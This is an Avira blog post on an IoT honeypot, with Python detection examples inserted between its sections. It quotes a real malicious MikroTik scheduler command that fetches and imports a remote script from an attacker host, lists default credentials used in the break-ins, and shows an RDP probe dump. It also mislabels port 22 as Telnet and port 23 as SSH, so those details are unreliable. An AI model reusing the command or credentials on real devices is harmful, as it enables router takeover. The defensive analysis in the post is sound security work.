Tuesday, October 22, 2019

Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices

Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use IP/port scanning scripts to find open ports on a device, with each open port linked to a corresponding service that communicates over it.

Essentially, the attackers are launching an automated search for open doors and windows. The IP/Port scanner itself can be very basic and simple to write at the entry level – or more complex depending on the attacker’s skill or objectives.

It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had experienced a range of attacks directed at Telnet and SSH services and at devices running Android.

Sharing is caring

These scanning scripts may appear to come from autonomous botnets, each individually probing for open ports or vulnerable services – but not always. Some attacking botnets are interconnected, sharing code and information behind the scenes about potentially infectable hosts. This automated data exchange begins within minutes of a script spotting an open port – and is followed by other botnets starting their assault. Shown below is a sequence of related attacks:

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
| 17357 | Wed, 18 Sep 2019 10:48:44 (UTC) | 22 (Telnet) | 79.36.*.* | 3.827 sec | root | zlxx. | Gathers information. Does not do anything malicious. |
| 17372 | Wed, 18 Sep 2019 10:48:49 (UTC) | 22 (Telnet) | 178.128.*.* | 87.575 sec | root | zlxx. | The real attack. Downloads malware and infects the device. |

On Wed, 18 Sep 2019 at 10:48:44 (UTC), someone from Italy (more accurately, a script) successfully logged into the honeypot with the username/password combination "root" / "zlxx.". This information was immediately shared with others. Five seconds later, someone from Singapore logged in with the same credentials and infected the device.

This data sharing and attack coordination shows that attackers have established a basic division of labor and inter-bot communication. Their first attack phase is to discover vulnerable devices and find a way in. The second phase is the actual device infection and gaining persistence.
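The pattern above, one credential pair used by two different source IPs a few seconds apart, is easy to surface from a honeypot's login log. The following detection routine is an added example, not Avira's honeypot code; the log lines are constructed from the figures in the table (the masked IPs are filled with placeholder zeros), and the one-minute window is an assumption chosen for this illustration.

```python
"""Flag honeypot logins where one credential pair is reused by a different
source IP within a short window, the inter-bot credential sharing the
article describes. Added example; the log below is constructed from the
article's table, not a real export (masked octets replaced with 0)."""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample: the two linked attacks from the article plus one
# unrelated brute-force login that must NOT be flagged.
SAMPLE_LOG = """\
17357|2019-09-18T10:48:44Z|22|79.36.0.0|root|zlxx.
17372|2019-09-18T10:48:49Z|22|178.128.0.0|root|zlxx.
17501|2019-09-18T11:32:59Z|23|185.234.0.0|Root|nosoup4u
"""


def parse_log(text):
    """Parse 'attack_no|timestamp|port|ip|user|password' lines into dicts,
    sorted by time. The password is taken verbatim (it may contain '|')."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        no, ts, port, ip, user, pw = line.split("|", 5)
        events.append({
            "attack_no": int(no),
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "port": int(port),
            "ip": ip,
            "cred": (user, pw),
        })
    return sorted(events, key=lambda e: e["ts"])


def find_shared_credentials(events, window_seconds=60):
    """For each credential pair, build the chain of logins by distinct source
    IPs where each login follows the previous chain member within the window.
    Returns only chains spanning at least two IPs, as
    {(user, password): [(attack_no, ip, timestamp), ...]}."""
    by_cred = defaultdict(list)
    for e in events:
        by_cred[e["cred"]].append(e)
    chains = {}
    for cred, logins in by_cred.items():
        chain = [logins[0]]
        for e in logins[1:]:
            gap = (e["ts"] - chain[-1]["ts"]).total_seconds()
            # Same IP retrying is brute force, not sharing; a long gap is
            # more likely an independent wordlist hit than a handoff.
            if e["ip"] != chain[-1]["ip"] and gap <= window_seconds:
                chain.append(e)
        if len({e["ip"] for e in chain}) >= 2:
            chains[cred] = [(e["attack_no"], e["ip"], e["ts"]) for e in chain]
    return chains


if __name__ == "__main__":
    for cred, chain in find_shared_credentials(parse_log(SAMPLE_LOG)).items():
        first, last = chain[0][2], chain[-1][2]
        print(f"{cred[0]}/{cred[1]}: {len(chain)} IPs within "
              f"{(last - first).total_seconds():.0f}s -> {[c[1] for c in chain]}")
```

Run over the constructed log, only the root/zlxx. pair is reported, with a 5-second gap between the Italian and Singaporean sources; the Root/nosoup4u login stands alone and is left for the brute-force analysis that follows.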

Blind shooting - brute-force attacks:

Sharing data is the exception at the moment. Sometimes an entire attack is conducted in one session. This is essentially a brute-force shotgun attack in the dark: all devices are targeted, the exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples of brute-force attacks.

Episode one:

We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from Ireland:

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
| 17501 | Wed, 18 Sep 2019 11:32:59 (UTC) | 23 (SSH) | 185.234.*.* | 38.482 sec | Root | nosoup4u | Downloads malware and infects the device. |

If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue. Someone just logged in, infected the system and left.

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
| 7193 | Tue, 17 Sep 2019 15:47:29 (UTC) | 23 (SSH) | 185.234.*.* | 38.117 sec | Root | nosoup4u | Downloads malware and infects the device. |

The attacker appears to have selected its victims randomly or sequentially and attacked them without even changing the username/password combination. Analysis of the credentials used reveals that these are the default credentials for DreamPlug routers. While every router gets the attack, it only hurts DreamPlug routers.

Episode two:

Attackers are also mixing ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB. However, the attack itself did not comply with the ADB protocol. Researchers dumped the attack payload to find out more:

    0000  03 00 00 2F 2A E0 00 00  00 00 00 43 6F 6F 6B 69  .../*......Cooki
    0010  65 3A 20 6D 73 74 73 68  61 73 68 3D 41 64 6D 69  e: mstshash=Admi
    0020  6E 69 73 74 72 0D 0A 01  00 08 00 01 00 00 00     nistr..........

Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol), which usually originates from Russia. The attack payload had nothing to do with ADB (Android Debug Bridge). The attackers simply saw an open port and sent a blind RDP attack in the hope of finding an RDP server on the other end.
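The dump can be decoded mechanically: a TPKT header, an X.224 Connection Request carrying an `mstshash=` cookie, and an RDP negotiation request. The parser below is an added example (not Avira's honeypot code) that classifies a first packet by what it actually speaks rather than by the port it arrived on, which is how a honeypot or IDS tells an RDP probe on 5555 apart from a real ADB client. The payload is the 47-byte dump from the article; the field layout follows the TPKT/X.224/RDP_NEG_REQ structures as documented in Microsoft's MS-RDPBCGR specification, and the `CNXN` check relies on the ADB protocol's CONNECT message header.

```python
"""Identify what protocol a first packet speaks, regardless of port.
Added example, not Avira's honeypot code. The payload is the 47-byte hex
dump from the article; the field offsets follow TPKT / X.224 Connection
Request / RDP_NEG_REQ as documented in MS-RDPBCGR."""
import struct

# Payload from the article's dump, transcribed into a byte string.
CAPTURED = bytes.fromhex(
    "0300002F2AE00000000000436F6F6B69"   # TPKT + X.224 CR header + "Cooki"
    "653A206D737473686173683D41646D69"   # "e: mstshash=Admi"
    "6E697374720D0A0100080001000000"     # "nistr\r\n" + RDP_NEG_REQ
)

# Bits of the requestedProtocols field in RDP_NEG_REQ (names as in MS-RDPBCGR).
REQUESTED_PROTOCOL_BITS = {
    0x1: "PROTOCOL_SSL",
    0x2: "PROTOCOL_HYBRID",
    0x4: "PROTOCOL_RDSTLS",
    0x8: "PROTOCOL_HYBRID_EX",
}


def parse_x224_connection_request(data):
    """Return {'cookie': str|None, 'negotiation': dict|None} if `data` is a
    complete TPKT-framed X.224 Connection Request, else None."""
    # TPKT: version 3, reserved 0, big-endian total length.
    if len(data) < 11 or data[0] != 0x03 or data[1] != 0x00:
        return None
    (tpkt_len,) = struct.unpack(">H", data[2:4])
    if tpkt_len != len(data):
        return None  # truncated or trailing garbage; do not guess
    li, tpdu = data[4], data[5]
    if tpdu & 0xF0 != 0xE0:  # 0xE0 = Connection Request TPDU
        return None
    # Fixed part after LI: CR/CDT, DST-REF(2), SRC-REF(2), CLASS = 6 bytes,
    # so the variable part starts at offset 11 and ends at 5 + LI.
    body = data[11:5 + li]
    cookie = None
    eol = body.find(b"\r\n")
    if eol != -1:
        cookie = body[:eol].decode("ascii", errors="replace")
        body = body[eol + 2:]
    negotiation = None
    if len(body) >= 8 and body[0] == 0x01:  # TYPE_RDP_NEG_REQ
        _type, flags, _length, protocols = struct.unpack("<BBHI", body[:8])
        negotiation = {"flags": flags, "requested_protocols": protocols}
    return {"cookie": cookie, "negotiation": negotiation}


def describe_probe(port, data):
    """Label a first packet by its content and note when that does not match
    the service expected on the port (5555 = ADB, 3389 = RDP)."""
    if data[:4] == b"CNXN":  # ADB CONNECT message command field
        return {"protocol": "adb", "port_mismatch": port != 5555}
    req = parse_x224_connection_request(data)
    if req is None:
        return {"protocol": "unknown", "port_mismatch": None}
    user = None
    if req["cookie"] and "mstshash=" in req["cookie"]:
        user = req["cookie"].split("mstshash=", 1)[1]
    protocols = []
    if req["negotiation"] is not None:
        bits = req["negotiation"]["requested_protocols"]
        protocols = [n for b, n in REQUESTED_PROTOCOL_BITS.items() if bits & b]
        if bits == 0:
            protocols = ["PROTOCOL_RDP"]  # legacy RDP security, no TLS
    return {
        "protocol": "rdp",
        "cookie": req["cookie"],
        "username_hint": user,
        "requested_protocols": protocols,
        "port_mismatch": port != 3389,
    }


if __name__ == "__main__":
    print(describe_probe(5555, CAPTURED))
```

On the captured bytes this yields an RDP connection request with the cookie `Cookie: mstshash=Administr` (the client's username hint, truncated to nine characters as RDP clients do), a request for TLS-protected RDP, and a port mismatch flag, which is exactly the "RDP probe on an ADB port" mismatch the researchers identified by hand.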

Episode three:

Similar to episode two, the honeypot caught another attack on SSH – a service used almost everywhere, from mainframes and enterprise servers to routers, IP cameras, and smartphones:

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write

This is a malicious MikroTik script that only affects MikroTik devices and has no effect on equipment from other manufacturers. Again, a shotgun-type approach that can only work a fraction of the time.
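For a MikroTik owner, the tell-tale sign in the command above is a scheduler entry that fetches a remote file and immediately imports it, running with nearly every policy the router offers. The following checker is an added example, not code from Avira or MikroTik: it parses `/system scheduler add` lines as they appear in a RouterOS export and reports that pattern. The malicious line is the one quoted in the article, the "nightly-backup" entry is constructed for contrast, and the set of policies treated as risky is this example's own judgment rather than a MikroTik definition.

```python
"""Parse RouterOS scheduler entries and flag the fetch-and-import pattern
from the article. Added example, not code from Avira or MikroTik. The
malicious line is quoted from the article; the benign line is constructed;
RISKY_POLICIES is this example's own judgment."""
import re

MALICIOUS = r'''/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write'''
BENIGN = '/system scheduler add name="nightly-backup" interval=1d on-event="/system backup save name=daily" policy=read,write'

# Policies that let a scheduled script change credentials, permissions or
# configuration, or read secrets (example's own choice, not a MikroTik list).
RISKY_POLICIES = {"password", "policy", "sensitive", "write", "ftp"}

# key=value, where value is either a double-quoted string (backslash escapes
# allowed) or a run of non-space characters.
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_routeros_add(line):
    """Split a '/path add key=value ...' line into its command path and a
    dict of key/value pairs; quoted values lose their surrounding quotes."""
    path, _, rest = line.partition(" add ")
    kv = {}
    for m in KV_RE.finditer(rest):
        key, val = m.group(1), m.group(2)
        if val.startswith('"') and val.endswith('"'):
            val = val[1:-1]
        kv[key] = val
    return path.strip(), kv


def assess_scheduler_entry(line):
    """Return the entry's name, interval, a verdict and the findings that
    led to it. 'malicious-pattern' means fetch-then-import on a schedule."""
    path, kv = parse_routeros_add(line)
    findings = []
    if path != "/system scheduler":
        return {"name": kv.get("name"), "interval": kv.get("interval"),
                "verdict": "not-a-scheduler-entry", "findings": findings}
    event = kv.get("on-event", "")
    fetch_and_import = "/tool fetch" in event and "/import" in event
    if fetch_and_import:
        findings.append("downloads a script with /tool fetch and runs it with /import")
    elif "/tool fetch" in event:
        findings.append("fetches a remote resource on a schedule")
    if re.search(r"https?://", event):
        findings.append("on-event references an external URL")
    granted = set(kv.get("policy", "").split(",")) - {""}
    risky = sorted(granted & RISKY_POLICIES)
    if risky:
        findings.append("runs with risky policies: " + ",".join(risky))
    verdict = "malicious-pattern" if fetch_and_import else ("review" if findings else "ok")
    return {"name": kv.get("name"), "interval": kv.get("interval"),
            "verdict": verdict, "findings": findings}


if __name__ == "__main__":
    for entry in (MALICIOUS, BENIGN):
        result = assess_scheduler_entry(entry)
        print(f"{result['name']}: {result['verdict']}")
        for f in result["findings"]:
            print("  -", f)
```

Fed the export of a router, this reports the U6 entry as `malicious-pattern` (fetch-and-import every ten minutes, an external URL, and the password/policy/sensitive/write/ftp policies), while the backup entry only earns a `review` note for its write policy, which is a reasonable prompt to confirm that a scheduled backup job is intentional.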

Attackers are looking, sharing, and acting

Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot collects almost ten attacks - an average of 14,125 attacks each day on just one individual device. An open port is an invitation that will not be refused.

Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices, and this will raise the risks for. Armed with information about open ports, attackers will strike, either with a more subtle coordinated approach or with a brute-force attack. This strategy is indirectly supported by device manufacturers that do not build security into product design, shipping blank or weak default passwords and poor device installation processes.

Block attackers at the doorway with Avira

The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.

This is why Avira has developed SafeThings™, comprehensive protection for all internet-connected devices in the home. For more information on Avira's insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.
